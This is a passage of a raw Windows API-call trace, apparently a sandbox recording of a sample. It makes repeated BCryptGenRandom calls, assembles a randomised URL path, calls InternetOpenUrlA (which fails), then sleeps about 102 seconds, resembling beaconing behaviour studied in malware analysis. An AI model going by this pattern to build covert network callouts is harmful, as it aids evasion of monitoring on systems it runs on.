lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.458] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.458] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.458] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0176.458] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.458] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0176.459] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.459] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0176.459] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.459] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a020dc, cbBuffer=0x28, dwFlags=0x2 | out: pbBuffer=0x3a020dc) returned 0x0 [0176.459] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.459] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.459] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.459] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.460] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.460] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.460] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.460] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.460] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.460] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.460] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.460] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.461] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.461] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.461] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.461] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.461] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.461] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.461] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.461] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.461] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.461] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.462] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.462] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.462] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.462] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.462] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.462] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.462] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.462] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.462] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.462] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.463] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.463] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.463] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.463] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0176.463] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.463] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.463] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.463] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.463] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.463] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.463] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.463] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.464] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.464] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.464] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.464] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.464] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.464] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0176.464] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.464] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.464] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.464] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0176.465] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.638] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.639] GetProcessHeap () returned 0x440000 [0176.639] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x472b10 [0176.639] lstrcpyA (in: lpString1=0x472b10, lpString2="\x81\x03" | out: lpString1="\x81\x03") returned="\x81\x03" [0176.639] lstrcatA (in: lpString1="\x81\x03", lpString2="/yhni80of2j7bNEx9vh2r333t1ab02j13g6i9bjfx0EkvMMzE/l30dMgTfilg94nSedfzviva8n2Mrnvlaw4/owzD34157owkkdlzRcacb7x4y/2z09t6sr6lO75ho6hwxfpw7eoZ4F/kgwbqxemezvkanleSaps8t4xPyxvU4c3kr4bDNp/" | out: lpString1="\x81\x03/yhni80of2j7bNEx9vh2r333t1ab02j13g6i9bjfx0EkvMMzE/l30dMgTfilg94nSedfzviva8n2Mrnvlaw4/owzD34157owkkdlzRcacb7x4y/2z09t6sr6lO75ho6hwxfpw7eoZ4F/kgwbqxemezvkanleSaps8t4xPyxvU4c3kr4bDNp/") returned="\x81\x03/yhni80of2j7bNEx9vh2r333t1ab02j13g6i9bjfx0EkvMMzE/l30dMgTfilg94nSedfzviva8n2Mrnvlaw4/owzD34157owkkdlzRcacb7x4y/2z09t6sr6lO75ho6hwxfpw7eoZ4F/kgwbqxemezvkanleSaps8t4xPyxvU4c3kr4bDNp/" [0176.640] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0176.640] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x81\x03/yhni80of2j7bNEx9vh2r333t1ab02j13g6i9bjfx0EkvMMzE/l30dMgTfilg94nSedfzviva8n2Mrnvlaw4/owzD34157owkkdlzRcacb7x4y/2z09t6sr6lO75ho6hwxfpw7eoZ4F/kgwbqxemezvkanleSaps8t4xPyxvU4c3kr4bDNp/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0176.640] GetProcessHeap () returned 0x440000 [0176.640] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x472b10 | out: hHeap=0x440000) returned 1 [0176.641] GetProcessHeap () returned 0x440000 [0176.641] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a02050 | out: hHeap=0x440000) returned 1 [0176.641] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0176.642] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0176.642] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.642] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0176.642] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0176.642] Sleep (dwMilliseconds=0x18f41) [0176.818] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.818] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0176.818] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.818] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0176.818] GetProcessHeap () returned 0x440000 [0176.818] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x95) returned 0x3a17840 [0176.818] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.818] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0176.819] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.819] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a17841, cbBuffer=0x1b, dwFlags=0x2 | out: pbBuffer=0x3a17841) returned 0x0 [0176.819] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.819] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0176.819] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.819] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0176.819] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.819] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.819] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.819] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.820] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.820] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.820] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.820] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.820] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.820] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.820] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.820] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.820] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.820] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.820] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.820] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0176.821] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.821] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.821] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.821] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0176.821] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.821] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0176.821] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.821] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0176.821] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.821] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.821] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.821] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.822] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.822] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0176.822] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.822] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.822] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.822] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.822] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.822] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0176.823] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.823] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.823] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.823] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.823] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.823] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0176.823] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.823] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1785c, cbBuffer=0x30, dwFlags=0x2 | out: pbBuffer=0x3a1785c) returned 0x0 [0176.823] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.823] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.824] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.824] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0176.824] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.826] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.826] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.826] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.826] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.826] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.826] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.826] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.826] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.826] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.826] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.826] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.827] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.827] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.827] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.827] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.827] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.827] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.827] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.827] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.827] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.827] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.828] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.828] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.828] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.828] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.828] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.828] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.828] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.828] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0176.828] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.828] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.829] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.829] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.829] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.829] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0176.829] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.829] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.829] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.829] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0176.829] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.829] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.829] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.830] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0176.830] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0176.830] BCryptGenRandom (in: hAlgorithm=0x0, 